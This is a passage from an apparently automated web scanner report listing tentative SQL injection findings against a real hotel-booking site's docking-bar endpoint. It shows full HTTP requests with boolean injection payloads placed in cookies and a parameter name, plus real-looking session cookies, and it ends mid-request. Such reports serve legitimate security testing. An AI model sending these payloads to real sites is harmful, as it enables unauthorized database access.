Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA17075075'%20or%201%3d1--%20; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.2.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA17075075'%20or%201%3d2--%20; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...
1.14. http://www.hotels.com/compare/hotel_dockingbar.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.2.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:17 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:17 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:18 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...
1.15. http://www.hotels.com/compare/hotel_dockingbar.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A108.1.0.i2%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:31 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjE5OC4yLjA6MTQ1LjAuMC5pMjoyMDAuMC4wOjEwOC4xLjAuaTI6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi42LjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4xLjAuaTF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:31 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
